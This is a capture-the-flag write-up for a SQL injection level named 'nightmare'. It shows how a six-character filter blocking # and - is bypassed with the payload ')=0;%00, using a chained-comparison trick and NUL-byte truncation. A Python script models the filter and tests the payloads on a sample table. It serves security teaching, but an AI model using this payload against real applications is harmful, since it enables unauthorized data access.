
nightmare


We are provided with the SQL query:

SELECT id FROM prob_nightmare WHERE pw=('{$_GET[pw]}') AND id!='admin'

Filter

The PHP code rejects the request if the pw parameter:

  • is longer than 6 characters
  • contains #
  • contains -

We do not know any password, and we do not need one. The expression pw=('') evaluates to 0 (FALSE) for every row whose password is non-empty, and MySQL evaluates chained comparisons left to right, so appending =0 turns the condition into (pw=(''))=0, which is TRUE for every such row.

Within the 6-character limit, we can provide the following URI parameter:

?pw=')=0

The resultant query becomes (the leftover tail after =0 still makes it syntactically invalid):

SELECT id FROM prob_nightmare WHERE pw=('')=0') AND id!='admin'


Now we have to get rid of the remainder of the query. Since # and - are filtered, we cannot comment it out, but a NUL byte (%00) does the job: the query is handed to the database driver as a C string, so everything after the NUL byte is dropped. We also place a semicolon (;) before the NUL byte so the statement ends cleanly. The decoded payload ')=0; followed by the NUL byte is exactly 6 bytes, so it still passes the length check.

If we provide the following URI parameter:

?pw=')=0;%00

The resultant query becomes:

SELECT id FROM prob_nightmare WHERE pw=('')=0;

## Terminated part:
') AND id!='admin'
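To check the reasoning above offline, here is an added Python example that is not part of the original writeup. It models the challenge's filter and the NUL-byte truncation (both are assumptions about the PHP backend: strlen counting the NUL byte, and the query being passed on as a C string), then runs the resulting query against a constructed sample table in SQLite, whose = operator, like MySQL's, is left-associative. The rows and passwords are made up.

```python
import sqlite3

# Constructed sample data: the real prob_nightmare rows are unknown.
ROWS = [("admin", "4g7hJ2"), ("guest", "guest")]


def passes_filter(pw: bytes) -> bool:
    """Model of the challenge filter as the writeup describes it.
    Assumption: the length check is PHP strlen, so the NUL byte counts."""
    return b"#" not in pw and b"-" not in pw and len(pw) <= 6


def build_query(pw: bytes) -> str:
    """Interpolate the already URL-decoded pw (%00 is a real NUL byte) into
    the challenge query, then cut at the first NUL: the query is handed to
    the database driver as a C string, so everything after it is dropped."""
    sql = b"SELECT id FROM prob_nightmare WHERE pw=('" + pw + b"') AND id!='admin'"
    return sql.split(b"\x00", 1)[0].decode()


def run(pw: bytes):
    """Return (final query, sorted ids it selects), or None if the filter
    rejects pw. Raises sqlite3.Error if the final query is malformed."""
    if not passes_filter(pw):
        return None
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE prob_nightmare(id TEXT, pw TEXT)")
    con.executemany("INSERT INTO prob_nightmare VALUES (?, ?)", ROWS)
    query = build_query(pw)
    try:
        ids = sorted(row[0] for row in con.execute(query))
    finally:
        con.close()
    return query, ids


if __name__ == "__main__":
    candidates = [
        b"4g7hJ2",       # even the right admin password is blocked by id!='admin'
        b"') or 1#",     # comment-based bypass: rejected by the filter
        b"')=0",         # truth-trick alone: leftover tail makes the SQL invalid
        b"')=0;\x00",    # the writeup's payload: tail is cut off at the NUL byte
    ]
    for pw in candidates:
        try:
            print(repr(pw), "->", run(pw))
        except sqlite3.Error as exc:
            print(repr(pw), "-> SQL error:", exc)
```

The last candidate returns every id, including admin, because the NUL byte removes both the dangling quote and the id!='admin' clause, and (pw=(''))=0 is TRUE for every row with a non-empty password.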
